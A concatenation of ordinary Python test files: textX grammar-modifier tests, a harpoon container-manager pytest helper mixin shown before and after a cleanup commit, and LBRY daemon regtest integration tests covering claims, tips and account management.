metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_modifier_eolterm_oneormore():
    """`eolterm` makes a `+` repetition stop at the end of the line."""
    grammar = """
    Rule:
        'first'
        INT+[eolterm] '123456';
    """
    mm = metamodel_from_str(grammar)
    # A newline straight after 'first' terminates the INT repetition
    # immediately, so the integers on the following line cannot be
    # consumed and '123456' is never reached.
    with pytest.raises(TextXSyntaxError):
        mm.model_from_str("""
        first
        34 56 88 65
        123456
        """)
    # With the integers on the same line as 'first' the repetition
    # consumes them; the newline then ends it and '123456' is matched.
    parsed = mm.model_from_str("""
    first 34 56 88 65
    123456
    """)
    assert parsed
def test_multiple_modifiers():
    """Several modifiers may be combined, separated by whitespace."""
    grammar = """
    Rule:
        'first'
        INT+[eolterm ','] '123456';
    """
    mm = metamodel_from_str(grammar)
    # A newline straight after 'first' ends the repetition early, so the
    # integers on the following lines cannot be parsed.
    with pytest.raises(TextXSyntaxError):
        mm.model_from_str("""
        first
        34 56 88 65
        123456
        """)
    # Comma-separated integers on the 'first' line parse fine; the
    # newline then terminates the repetition and '123456' is matched.
    parsed = mm.model_from_str("""
    first 34, 56, 88, 65
    123456
    """)
    assert parsed
|
from harpoon.container_manager import make_server
from contextlib import contextmanager
import subprocess
import threading
import requests
import tempfile
import socket
import psutil
import signal
import pytest
import time
import sys
import os
@contextmanager
def config_file(content):
    """Yield the path of a temporary file containing ``content``.

    The file is removed when the context exits, even on error.
    """
    path = None
    try:
        # delete=False so the file survives being closed and can be
        # reopened by name (required on Windows, harmless elsewhere).
        tmp = tempfile.NamedTemporaryFile(delete=False)
        path = tmp.name
        # BUGFIX: close the original handle before reopening by name; the
        # original code rebound ``fle`` and leaked this file descriptor.
        tmp.close()
        with open(path, "w") as fle:
            fle.write(content)
        yield path
    finally:
        if path and os.path.exists(path):
            os.remove(path)
class Container_managerAssertionsMixin:
    """Helpers for container-manager tests: port/pid probes, wait-with-timeout
    assertions, and launchers that run the manager either in-process or as a
    subprocess.
    """

    class Manager:
        """Minimal manager stand-in that just records shutdown hooks."""

        def __init__(self):
            self.shutdowns = []

    def port_connected(self, port):
        """Return True when something accepts TCP connections on 127.0.0.1:port."""
        s = socket.socket()
        s.settimeout(5)
        try:
            s.connect(("127.0.0.1", port))
            s.close()
            return True
        except Exception:
            return False

    def pid_running(self, pid):
        """Return True when a process with ``pid`` currently exists."""
        return pid in [p.pid for p in psutil.process_iter()]

    def assertPIDGoneWithin(self, pid, timeout):
        """Fail unless process ``pid`` disappears within ``timeout`` seconds."""
        start = time.time()
        while time.time() - start < timeout:
            if not self.pid_running(pid):
                return
            time.sleep(0.1)
        assert not self.pid_running(pid)

    def free_port(self):
        """Ask the OS for a currently unused TCP port number."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind(("0.0.0.0", 0))
            return s.getsockname()[1]

    def local(self, port, path):
        """Build a localhost URI for ``path`` on ``port``."""
        return "http://localhost:{0}{1}".format(port, path)

    def wait_for_pid(self, pid, timeout=5):
        """Terminate ``pid`` and wait up to ``timeout`` seconds for it to exit.

        SIGTERM is sent while the process is alive; SIGKILL is the last
        resort once the timeout expires.
        """
        start = time.time()
        while time.time() - start < timeout:
            # BUGFIX: the original condition was inverted -- it returned
            # immediately while the process was still running and only
            # signalled processes that had already exited.
            if not self.pid_running(pid):
                return
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Exited between the liveness check and the signal.
                return
            time.sleep(0.1)
        if self.pid_running(pid):
            os.kill(pid, signal.SIGKILL)

    def wait_for_file(self, filename, timeout=5):
        """Block until ``filename`` exists, failing after ``timeout`` seconds."""
        start = time.time()
        while time.time() - start < timeout:
            if os.path.exists(filename):
                return
            time.sleep(0.1)
        if not os.path.exists(filename):
            assert False, "Failed to wait for filename: {0}".format(filename)

    def wait_for_port(self, port, timeout=2):
        """Block until ``port`` accepts connections, failing after ``timeout``."""
        start = time.time()
        while time.time() - start < timeout:
            if self.port_connected(port):
                return
            time.sleep(0.1)
        assert self.port_connected(port)

    def assertForks(self, info, timeout=1):
        """Fail unless the subprocess recorded in ``info`` finishes within ``timeout``."""
        start = time.time()
        while time.time() - start < timeout:
            if info["done"]:
                return
            # BUGFIX: sleep instead of busy-spinning a whole CPU while waiting.
            time.sleep(0.05)
        if not info["done"]:
            assert False, "The process should have forked, but it hasn't within timeout"

    def version(self, info):
        """Fetch and decode the /version endpoint of a started manager."""
        return requests.get(self.local(info["port"], "/version")).content.decode()

    def start_inprocess(self, manager):
        """Serve ``manager`` on a free port from a daemon thread.

        Returns a function mapping a path to a URI on that server.
        """
        port = self.free_port()
        server = make_server(manager, ("127.0.0.1", port))
        self.shutdowns.append(server.shutdown)
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
        self.wait_for_port(port)
        return lambda path: "http://127.0.0.1:{0}{1}".format(port, path)

    def start(self, specifier, filename=None, port=None, log_file=None, config=""):
        """Launch the container manager as a subprocess.

        Returns an ``info`` dict carrying the child's pid, port, a ``uri``
        helper and a ``shutdown`` callable; ``done`` flips once the child
        process exits.
        """
        info = {"done": False, "pid": None, "port": port}

        def shutdown():
            if filename or not info["done"]:
                if info["port"]:
                    requests.get("http://localhost:{0}/shutdown".format(info["port"]))
                if info["pid"]:
                    self.wait_for_pid(info["pid"])
                if "p" in info:
                    info["p"].kill()

        self.shutdowns.append(shutdown)
        info["shutdown"] = shutdown

        def start():
            options = ""
            if log_file:
                options = ', "--logging-handler-file", "{0}"'.format(log_file)
            with config_file(config) as cfg:
                env = dict(os.environ)
                env["HARPOON_CONFIG"] = cfg
                command = (
                    'from harpoon.executor import main; main(["container_manager", "{0}"{1}])'
                )
                info["p"] = subprocess.Popen(
                    [sys.executable, "-c", command.format(specifier, options)], env=env
                )
                info["p"].wait()
            info["done"] = True

        thread = threading.Thread(target=start)
        thread.daemon = True
        thread.start()

        if port:
            self.wait_for_port(port)

        if filename:
            # The child writes "<port>\n<pid>\n" to ``filename`` once it is up.
            self.wait_for_file(filename)
            with open(filename) as fle:
                lines = fle.readlines()
            assert len(lines) == 2
            info["port"] = int(lines[0])
            if port:
                assert info["port"] == port
            info["pid"] = int(lines[1])
            assert self.pid_running(info["pid"])

        info["uri"] = lambda path: "http://localhost:{0}{1}".format(info["port"], path)
        return info

    @pytest.fixture()
    def container_manager(self):
        """Yield a Manager and run every registered shutdown hook afterwards."""
        manager = self.Manager()
        try:
            yield manager
        finally:
            errors = []
            for shutdown in manager.shutdowns:
                try:
                    shutdown()
                except Exception as error:
                    errors.append(error)
            assert len(errors) == 0
Cleanup container manager test mixin a little
from harpoon.container_manager import make_server
from contextlib import contextmanager
import subprocess
import threading
import requests
import tempfile
import socket
import psutil
import signal
import pytest
import time
import sys
import os
@contextmanager
def config_file(content):
    """Yield the path of a temporary file containing ``content``.

    The file is removed when the context exits, even on error.
    """
    path = None
    try:
        # delete=False so the file survives being closed and can be
        # reopened by name (required on Windows, harmless elsewhere).
        tmp = tempfile.NamedTemporaryFile(delete=False)
        path = tmp.name
        # BUGFIX: close the original handle before reopening by name; the
        # original code rebound ``fle`` and leaked this file descriptor.
        tmp.close()
        with open(path, "w") as fle:
            fle.write(content)
        yield path
    finally:
        if path and os.path.exists(path):
            os.remove(path)
class Container_managerAssertionsMixin:
    """Helpers for container-manager tests: port/pid probes, wait-with-timeout
    assertions, and launchers that run the manager either in-process or as a
    subprocess.
    """

    class Manager:
        """Minimal manager stand-in that just records shutdown hooks."""

        def __init__(self):
            self.shutdowns = []

    def port_connected(self, port):
        """Return True when something accepts TCP connections on 127.0.0.1:port."""
        s = socket.socket()
        s.settimeout(5)
        try:
            s.connect(("127.0.0.1", port))
            s.close()
            return True
        except Exception:
            return False

    def pid_running(self, pid):
        """Return True when a process with ``pid`` currently exists."""
        return pid in [p.pid for p in psutil.process_iter()]

    def assertPIDGoneWithin(self, pid, timeout):
        """Fail unless process ``pid`` disappears within ``timeout`` seconds."""
        start = time.time()
        while time.time() - start < timeout:
            if not self.pid_running(pid):
                return
            time.sleep(0.1)
        assert not self.pid_running(pid)

    def free_port(self):
        """Ask the OS for a currently unused TCP port number."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind(("0.0.0.0", 0))
            return s.getsockname()[1]

    def local(self, port, path):
        """Build a localhost URI for ``path`` on ``port``."""
        return "http://localhost:{0}{1}".format(port, path)

    def wait_for_pid(self, pid, timeout=5):
        """Terminate ``pid`` and wait up to ``timeout`` seconds for it to exit.

        SIGTERM is sent while the process is alive; SIGKILL is the last
        resort once the timeout expires.
        """
        start = time.time()
        while time.time() - start < timeout:
            # BUGFIX: the original condition was inverted -- it returned
            # immediately while the process was still running and only
            # signalled processes that had already exited.
            if not self.pid_running(pid):
                return
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Exited between the liveness check and the signal.
                return
            time.sleep(0.1)
        if self.pid_running(pid):
            os.kill(pid, signal.SIGKILL)

    def wait_for_file(self, filename, timeout=5):
        """Block until ``filename`` exists, failing after ``timeout`` seconds."""
        start = time.time()
        while time.time() - start < timeout:
            if os.path.exists(filename):
                return
            time.sleep(0.1)
        if not os.path.exists(filename):
            assert False, "Failed to wait for filename: {0}".format(filename)

    def wait_for_port(self, port, timeout=2):
        """Block until ``port`` accepts connections, failing after ``timeout``."""
        start = time.time()
        while time.time() - start < timeout:
            if self.port_connected(port):
                return
            time.sleep(0.1)
        assert self.port_connected(port)

    def assertForks(self, info, timeout=1):
        """Fail unless the subprocess recorded in ``info`` finishes within ``timeout``."""
        start = time.time()
        while time.time() - start < timeout:
            if info["done"]:
                return
            # BUGFIX: sleep instead of busy-spinning a whole CPU while waiting.
            time.sleep(0.05)
        if not info["done"]:
            assert False, "The process should have forked, but it hasn't within timeout"

    def version(self, info):
        """Fetch and decode the /version endpoint of a started manager."""
        return requests.get(self.local(info["port"], "/version")).content.decode()

    def start_inprocess(self, manager):
        """Serve ``manager`` on a free port from a daemon thread.

        A shutdown hook asking the server to stop (unless the manager is
        already shutting down) is registered; returns a function mapping a
        path to a URI on that server.
        """
        port = self.free_port()
        server = make_server(manager, ("127.0.0.1", port))
        uri = lambda path: "http://127.0.0.1:{0}{1}".format(port, path)

        def shutdown():
            if manager.shutting_down is not True:
                requests.get(uri("/shutdown"))

        self.shutdowns.append(shutdown)
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
        self.wait_for_port(port)
        return uri

    def start(self, specifier, filename=None, port=None, log_file=None, config=""):
        """Launch the container manager as a subprocess.

        Returns an ``info`` dict carrying the child's pid, port, a ``uri``
        helper and a ``shutdown`` callable; ``done`` flips once the child
        process exits.
        """
        uri = lambda path: "http://localhost:{0}{1}".format(info["port"], path)
        info = {"done": False, "pid": None, "port": port, "uri": uri}

        def shutdown():
            if filename or not info["done"]:
                if info["port"]:
                    requests.get(uri("/shutdown"))
                if info["pid"]:
                    self.wait_for_pid(info["pid"])
                if "p" in info:
                    info["p"].kill()

        self.shutdowns.append(shutdown)
        info["shutdown"] = shutdown

        def start():
            options = ""
            if log_file:
                options = ', "--logging-handler-file", "{0}"'.format(log_file)
            with config_file(config) as cfg:
                env = dict(os.environ)
                env["HARPOON_CONFIG"] = cfg
                command = (
                    'from harpoon.executor import main; main(["container_manager", "{0}"{1}])'
                )
                info["p"] = subprocess.Popen(
                    [sys.executable, "-c", command.format(specifier, options)], env=env
                )
                info["p"].wait()
            info["done"] = True

        thread = threading.Thread(target=start)
        thread.daemon = True
        thread.start()

        if port:
            self.wait_for_port(port)

        if filename:
            # The child writes "<port>\n<pid>\n" to ``filename`` once it is up.
            self.wait_for_file(filename)
            with open(filename) as fle:
                lines = fle.readlines()
            assert len(lines) == 2
            info["port"] = int(lines[0])
            if port:
                assert info["port"] == port
            info["pid"] = int(lines[1])
            assert self.pid_running(info["pid"])

        return info

    @pytest.fixture()
    def container_manager(self):
        """Yield a Manager and run every registered shutdown hook afterwards."""
        manager = self.Manager()
        try:
            yield manager
        finally:
            errors = []
            for shutdown in manager.shutdowns:
                try:
                    shutdown()
                except Exception as error:
                    errors.append(error)
            assert len(errors) == 0
|
import sys
import json
import tempfile
import logging
from binascii import unhexlify
import twisted.internet
from twisted.internet.asyncioreactor import AsyncioSelectorReactor
from lbrynet.extras.wallet.transaction import Transaction
from lbrynet.p2p.Error import InsufficientFundsError
from lbrynet.schema.claim import ClaimDict
from torba.testcase import IntegrationTestCase
import lbrynet.schema
lbrynet.schema.BLOCKCHAIN_NAME = 'lbrycrd_regtest'
from lbrynet import conf as lbry_conf
from lbrynet.extras.daemon.Daemon import Daemon, jsonrpc_dumps_pretty
from lbrynet.extras.wallet import LbryWalletManager
from lbrynet.extras.daemon.Components import WalletComponent
from lbrynet.extras.daemon.Components import (
DHT_COMPONENT, HASH_ANNOUNCER_COMPONENT, PEER_PROTOCOL_SERVER_COMPONENT,
REFLECTOR_COMPONENT, UPNP_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
)
from lbrynet.extras.daemon.ComponentManager import ComponentManager
class FakeAnalytics:
    """Inert analytics manager for tests: every hook is accepted and ignored."""

    @property
    def is_started(self):
        """Always report the analytics service as started."""
        return True

    def send_new_channel(self):
        """Ignore new-channel events."""

    def shutdown(self):
        """Nothing to tear down."""

    def send_claim_action(self, action):
        """Ignore claim actions."""

    def send_credits_sent(self):
        """Ignore credits-sent events."""

    def send_server_startup(self):
        """Ignore server-startup events."""
class CommandTestCase(IntegrationTestCase):
    """Base class for daemon command integration tests.

    Spins up a Daemon wired to the test wallet/blockchain nodes provided by
    ``IntegrationTestCase`` and funds the default account with 10 coins.
    """

    timeout = 180
    MANAGER = LbryWalletManager
    VERBOSITY = logging.WARN

    async def asyncSetUp(self):
        """Configure regtest settings, fund the account, and start the daemon."""
        await super().asyncSetUp()

        # Install an asyncio-driven twisted reactor so twisted-based code
        # shares the event loop used by these async tests.
        twisted.internet.reactor = sys.modules['twisted.internet.reactor'] = AsyncioSelectorReactor()

        logging.getLogger('lbrynet.p2p').setLevel(self.VERBOSITY)
        logging.getLogger('lbrynet.daemon').setLevel(self.VERBOSITY)

        # Rebuild settings from scratch, pointing every directory at the
        # test wallet node's data path and targeting the regtest chain.
        lbry_conf.settings = None
        lbry_conf.initialize_settings(
            load_conf_file=False,
            data_dir=self.wallet_node.data_path,
            wallet_dir=self.wallet_node.data_path,
            download_dir=self.wallet_node.data_path
        )
        lbry_conf.settings['use_upnp'] = False
        lbry_conf.settings['reflect_uploads'] = False
        lbry_conf.settings['blockchain_name'] = 'lbrycrd_regtest'
        lbry_conf.settings['lbryum_servers'] = [('localhost', 50001)]
        lbry_conf.settings['known_dht_nodes'] = []
        lbry_conf.settings.node_id = None

        # Fund the default account with 10 coins and let them confirm.
        await self.account.ensure_address_gap()
        address = (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
        sendtxid = await self.blockchain.send_to_address(address, 10)
        await self.confirm_tx(sendtxid)
        await self.generate(5)

        def wallet_maker(component_manager):
            # Hand the daemon a pre-built wallet component backed by the
            # test wallet manager, marked as already running.
            self.wallet_component = WalletComponent(component_manager)
            self.wallet_component.wallet_manager = self.manager
            self.wallet_component._running = True
            return self.wallet_component

        # Skip components that need external services or the network.
        skip = [
            DHT_COMPONENT, UPNP_COMPONENT, HASH_ANNOUNCER_COMPONENT,
            PEER_PROTOCOL_SERVER_COMPONENT, REFLECTOR_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
        ]
        analytics_manager = FakeAnalytics()
        self.daemon = Daemon(analytics_manager, ComponentManager(
            analytics_manager=analytics_manager,
            skip_components=skip, wallet=wallet_maker
        ))
        await self.daemon.setup()
        self.daemon.wallet_manager = self.wallet_component.wallet_manager
        self.manager.old_db = self.daemon.storage

    async def asyncTearDown(self):
        """Stop the daemon after marking the wallet component as stopped."""
        await super().asyncTearDown()
        self.wallet_component._running = False
        await self.daemon.shutdown()

    async def confirm_tx(self, txid):
        """ Wait for tx to be in mempool, then generate a block, wait for tx to be in a block. """
        await self.on_transaction_id(txid)
        await self.generate(1)
        await self.on_transaction_id(txid)

    async def on_transaction_dict(self, tx):
        """Wait until the ledger has processed the transaction given as a dict."""
        await self.ledger.wait(
            self.ledger.transaction_class(unhexlify(tx['hex']))
        )

    @staticmethod
    def get_all_addresses(tx):
        """Collect the distinct addresses used by a transaction dict's inputs/outputs."""
        addresses = set()
        for txi in tx['inputs']:
            addresses.add(txi['address'])
        for txo in tx['outputs']:
            addresses.add(txo['address'])
        return list(addresses)

    async def generate(self, blocks):
        """ Ask lbrycrd to generate some blocks and wait until ledger has them. """
        await self.blockchain.generate(blocks)
        await self.ledger.on_header.where(self.blockchain.is_expected_block)

    async def out(self, awaitable):
        """ Converts Daemon API call results (dictionary)
        to JSON and then back to a dictionary. """
        return json.loads(jsonrpc_dumps_pretty(await awaitable, ledger=self.ledger))['result']
class EpicAdventuresOfChris45(CommandTestCase):
    """Narrative end-to-end test exercising channels, publishing, updating,
    abandoning, sending funds, supports and tips against a regtest chain.

    The exact balance assertions below encode the fee schedule of the
    operations performed, so the sequence of calls must not be reordered.
    """

    VERBOSITY = logging.WARN

    async def test_no_this_is_not_a_test_its_an_adventure(self):
        # Chris45 is an avid user of LBRY and this is his story. It's fact and fiction
        # and everything in between; it's also the setting of some record setting
        # integration tests.

        # Chris45 starts everyday by checking his balance.
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '10.0')
        # "10 LBC, yippy! I can do a lot with that.", he thinks to himself,
        # enthusiastically. But he is hungry so he goes into the kitchen
        # to make himself a spamdwich.

        # While making the spamdwich he wonders... has anyone on LBRY
        # registered the @spam channel yet? "I should do that!" he
        # exclaims and goes back to his computer to do just that!
        channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', "1.0"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])

        # Do we have it locally?
        channels = await self.out(self.daemon.jsonrpc_channel_list())
        self.assertEqual(len(channels), 1)
        self.assertEqual(channels[0]['name'], '@spam')

        # As the new channel claim travels through the intertubes and makes its
        # way into the mempool and then a block and then into the claimtrie,
        # Chris doesn't sit idly by: he checks his balance!
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '8.989893')

        # He waits for 6 more blocks (confirmations) to make sure the balance has been settled.
        await self.generate(6)
        result = await self.daemon.jsonrpc_account_balance(confirmations=6)
        self.assertEqual(result, '8.989893')

        # And is the channel resolvable and empty?
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam'))
        self.assertIn('lbry://@spam', response)
        self.assertIn('certificate', response['lbry://@spam'])

        # "What goes well with spam?" ponders Chris...
        # "A hovercraft with eels!" he exclaims.
        # "That's what goes great with spam!" he further confirms.

        # And so, many hours later, Chris is finished writing his epic story
        # about eels driving a hovercraft across the wetlands while eating spam
        # and decides it's time to publish it to the @spam channel.
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'blah blah blah...')
            file.write(b'[insert long story about eels driving hovercraft]')
            file.write(b'yada yada yada!')
            file.write(b'the end')
            file.flush()
            claim1 = await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name, channel_id=channel['claim_id']
            ))
            self.assertTrue(claim1['success'])
            await self.confirm_tx(claim1['tx']['txid'])

        # He quickly checks the unconfirmed balance to make sure everything looks
        # correct.
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '7.969786')

        # Also checks that his new story can be found on the blockchain before
        # giving the link to all his friends.
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
        self.assertIn('lbry://@spam/hovercraft', response)
        self.assertIn('claim', response['lbry://@spam/hovercraft'])

        # He goes to tell everyone about it and in the meantime 5 blocks are confirmed.
        await self.generate(5)
        # When he comes back he verifies the confirmed balance.
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '7.969786')

        # As people start reading his story they discover some typos and notify
        # Chris who explains in despair "Oh! Noooooos!" but then remembers
        # "No big deal! I can update my claim." And so he updates his claim.
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'blah blah blah...')
            file.write(b'[typo fixing sounds being made]')
            file.write(b'yada yada yada!')
            file.flush()
            claim2 = await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name, channel_name='@spam'
            ))
            self.assertTrue(claim2['success'])
            self.assertEqual(claim2['claim_id'], claim1['claim_id'])
            await self.confirm_tx(claim2['tx']['txid'])

        # After some soul searching Chris decides that his story needs more
        # heart and a better ending. He takes down the story and begins the rewrite.
        abandon = await self.out(self.daemon.jsonrpc_claim_abandon(claim1['claim_id'], blocking=False))
        self.assertTrue(abandon['success'])
        await self.confirm_tx(abandon['tx']['txid'])

        # And now checks that the claim doesn't resolve anymore.
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
        self.assertNotIn('claim', response['lbry://@spam/hovercraft'])

        # After abandoning he just waits for his LBCs to be returned to his account
        await self.generate(5)
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '8.9693585')

        # Amidst all this Chris receives a call from his friend Ramsey
        # who says that it is of utmost urgency that Chris transfer him
        # 1 LBC to which Chris readily obliges
        ramsey_account_id = (await self.daemon.jsonrpc_account_create("Ramsey"))['id']
        ramsey_account = self.daemon.get_account_or_error(ramsey_account_id)
        ramsey_address = await self.daemon.jsonrpc_address_unused(ramsey_account_id)
        result = await self.out(self.daemon.jsonrpc_wallet_send('1.0', ramsey_address))
        self.assertIn("txid", result)
        await self.confirm_tx(result['txid'])

        # Chris then eagerly waits for 6 confirmations to check his balance and then calls Ramsey to verify whether
        # he received it or not
        await self.generate(5)
        result = await self.daemon.jsonrpc_account_balance()
        # Chris' balance was correct
        self.assertEqual(result, '7.9692345')

        # Ramsey too assured him that he had received the 1 LBC and thanks him
        result = await self.daemon.jsonrpc_account_balance(ramsey_account_id)
        self.assertEqual(result, '1.0')

        # After Chris is done with all the "helping other people" stuff he decides that it's time to
        # write a new story and publish it to lbry. All he needed was a fresh start and he came up with:
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'Amazingly Original First Line')
            file.write(b'Super plot for the grand novel')
            file.write(b'Totally un-cliched ending')
            file.write(b'**Audience Gasps**')
            file.flush()
            claim3 = await self.out(self.daemon.jsonrpc_publish(
                'fresh-start', '1.0', file_path=file.name, channel_name='@spam'
            ))
            self.assertTrue(claim3['success'])
            await self.confirm_tx(claim3['tx']['txid'])

        await self.generate(5)

        # He gives the link of his story to all his friends and hopes that this is the much needed break for him
        uri = 'lbry://@spam/fresh-start'

        # And voila, and bravo and encore! His Best Friend Ramsey read the story and immediately knew this was a hit
        # Now to keep this claim winning on the lbry blockchain he immediately supports the claim
        tx = await self.out(self.daemon.jsonrpc_claim_new_support(
            'fresh-start', claim3['claim_id'], '0.2', account_id=ramsey_account_id
        ))
        await self.confirm_tx(tx['txid'])

        # And check if his support showed up
        resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        # It obviously did! Because, blockchain baby \O/
        self.assertEqual(resolve_result[uri]['claim']['amount'], '1.0')
        self.assertEqual(resolve_result[uri]['claim']['effective_amount'], '1.2')
        self.assertEqual(resolve_result[uri]['claim']['supports'][0]['amount'], '0.2')
        self.assertEqual(resolve_result[uri]['claim']['supports'][0]['txid'], tx['txid'])
        await self.generate(5)

        # Now he also wanted to support the original creator of the Award Winning Novel
        # So he quickly decides to send a tip to him
        tx = await self.out(
            self.daemon.jsonrpc_claim_tip(claim3['claim_id'], '0.3', account_id=ramsey_account_id))
        await self.confirm_tx(tx['txid'])

        # And again checks if it went to the just right place
        resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        # Which it obviously did. Because....?????
        self.assertEqual(resolve_result[uri]['claim']['supports'][1]['amount'], '0.3')
        self.assertEqual(resolve_result[uri]['claim']['supports'][1]['txid'], tx['txid'])
        await self.generate(5)

        # Seeing the ravishing success of his novel Chris adds support to his claim too
        tx = await self.out(self.daemon.jsonrpc_claim_new_support('fresh-start', claim3['claim_id'], '0.4'))
        await self.confirm_tx(tx['txid'])

        # And check if his support showed up
        resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        # It did!
        self.assertEqual(resolve_result[uri]['claim']['supports'][2]['amount'], '0.4')
        self.assertEqual(resolve_result[uri]['claim']['supports'][2]['txid'], tx['txid'])
        await self.generate(5)

        # Now Ramsey who is a singer by profession, is preparing for his new "gig". He has everything in place for that
        # the instruments, the theatre, the ads, everything, EXCEPT lyrics!! He panicked.. But then he remembered
        # something, so he un-panicked. He quickly calls up his best bud Chris and requests him to write hit lyrics for
        # his song, seeing as his novel had smashed all the records, he was the perfect candidate!
        # .......
        # Chris agrees.. 17 hours 43 minutes and 14 seconds later, he makes his publish
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'The Whale amd The Bookmark')
            file.write(b'I know right? Totally a hit song')
            file.write(b'That\'s what goes around for songs these days anyways')
            file.flush()
            claim4 = await self.out(self.daemon.jsonrpc_publish(
                'hit-song', '1.0', file_path=file.name, channel_id=channel['claim_id']
            ))
            self.assertTrue(claim4['success'])
            await self.confirm_tx(claim4['tx']['txid'])

        await self.generate(5)

        # He sends the link to Ramsey, all happy and proud
        uri = 'lbry://@spam/hit-song'

        # But sadly Ramsey wasn't so pleased. It was hard for him to tell Chris...
        # Chris, though a bit heartbroken, abandoned the claim for now, but instantly started working on new hit lyrics
        abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=claim4['tx']['txid'], nout=0, blocking=False))
        self.assertTrue(abandon['success'])
        await self.confirm_tx(abandon['tx']['txid'])

        # He them checks that the claim doesn't resolve anymore.
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertNotIn('claim', response[uri])
class AccountManagement(CommandTestCase):
    """Exercises the account_* daemon commands: list, set, create, remove, add."""

    # NOTE(review): siblings configure logging via ``VERBOSITY``; this
    # ``VERBOSE`` attribute is not read by the visible code -- likely a
    # leftover from an older naming scheme. Confirm before removing.
    VERBOSE = False

    async def test_performing_account_management_commands(self):
        # check initial account
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 1)

        # change account name and gap
        account_id = response['lbc_regtest'][0]['id']
        self.daemon.jsonrpc_account_set(
            account_id=account_id, new_name='test account',
            receiving_gap=95, receiving_max_uses=96,
            change_gap=97, change_max_uses=98
        )
        response = (await self.daemon.jsonrpc_account_list())['lbc_regtest'][0]
        self.assertEqual(response['name'], 'test account')
        self.assertEqual(
            response['address_generator']['receiving'],
            {'gap': 95, 'maximum_uses_per_address': 96}
        )
        self.assertEqual(
            response['address_generator']['change'],
            {'gap': 97, 'maximum_uses_per_address': 98}
        )

        # create another account
        await self.daemon.jsonrpc_account_create('second account')
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 2)
        self.assertEqual(response['lbc_regtest'][1]['name'], 'second account')
        account_id2 = response['lbc_regtest'][1]['id']

        # make new account the default
        self.daemon.jsonrpc_account_set(account_id=account_id2, default=True)
        response = await self.daemon.jsonrpc_account_list(show_seed=True)
        self.assertEqual(response['lbc_regtest'][0]['name'], 'second account')

        account_seed = response['lbc_regtest'][1]['seed']

        # remove account
        self.daemon.jsonrpc_account_remove(response['lbc_regtest'][1]['id'])
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 1)

        # add account
        await self.daemon.jsonrpc_account_add('recreated account', seed=account_seed)
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 2)
        self.assertEqual(response['lbc_regtest'][1]['name'], 'recreated account')

        # list specific account
        response = await self.daemon.jsonrpc_account_list(account_id, include_claims=True)
        self.assertEqual(response['name'], 'recreated account')
class ClaimManagement(CommandTestCase):
VERBOSITY = logging.WARN
async def make_claim(self, name='hovercraft', amount='1.0', data=b'hi!', channel_name=None, confirm=True):
    """Publish ``data`` as a claim called ``name``; return the publish result dict.

    When ``confirm`` is True, waits for the claim transaction to reach the
    mempool, mines a block, and waits for it to be included.
    """
    with tempfile.NamedTemporaryFile() as file:
        file.write(data)
        file.flush()
        claim = await self.out(self.daemon.jsonrpc_publish(
            name, amount, file_path=file.name, channel_name=channel_name
        ))
        self.assertTrue(claim['success'])
    if confirm:
        await self.on_transaction_dict(claim['tx'])
        await self.generate(1)
        await self.on_transaction_dict(claim['tx'])
    return claim
async def craft_claim(self, name, amount_dewies, claim_dict, address):
    """Build, broadcast and confirm a claim transaction directly,
    bypassing ``jsonrpc_publish`` and its defensive checks.
    """
    # FIXME: this is here mostly because publish has defensive code for situations that happens accidentally
    # However, it still happens... So, let's reproduce them.
    claim = ClaimDict.load_dict(claim_dict)
    # Fall back to a usable receiving address of the default account.
    address = address or (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
    tx = await Transaction.claim(name, claim, amount_dewies, address, [self.account], self.account)
    await self.broadcast(tx)
    await self.ledger.wait(tx)
    await self.generate(1)
    await self.ledger.wait(tx)
    return tx
async def test_create_update_and_abandon_claim(self):
    """Claim lifecycle: create, update, abandon, checking the transaction
    history entries and exact balances/fees at each step.
    """
    self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())

    claim = await self.make_claim(amount='2.5')  # creates new claim
    txs = await self.out(self.daemon.jsonrpc_transaction_list())
    self.assertEqual(len(txs[0]['claim_info']), 1)
